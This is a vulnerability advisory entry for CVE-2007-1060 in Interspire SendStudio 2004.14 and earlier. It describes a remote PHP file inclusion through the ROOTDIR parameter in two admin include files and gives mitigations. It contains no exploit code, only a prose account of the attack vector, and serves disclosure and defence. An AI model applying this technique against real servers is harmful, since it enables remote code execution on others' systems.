PT-2007-2488 · Interspire · Interspire Sendstudio

M.Hasran Addahroni

Published

2007-02-22

Updated

2018-10-16

CVE-2007-1060

CVSS v2.0

6.8

Medium

Vector

AV:N/AC:M/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions: Interspire SendStudio versions 2004.14 and earlier

Description: The issue allows remote attackers to execute arbitrary PHP code when register globals and allow fopenurl are enabled. This is achieved by providing a URL in the ROOTDIR parameter to specific PHP files, including createemails.inc.php and send emails.inc.php in the /admin/includes/ directory.

Recommendations: For Interspire SendStudio versions 2004.14 and earlier, consider disabling the register globals and allow fopenurl settings to prevent exploitation. Additionally, restrict access to the /admin/includes/ directory and the createemails.inc.php and send emails.inc.php files to minimize the risk of arbitrary PHP code execution.

Exploit

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Related Identifiers

CVE-2007-1060

Affected Products

Interspire Sendstudio

PT-2007-2488 · Interspire · Interspire Sendstudio

CVE-2007-1060

Related Identifiers

Affected Products

References · 11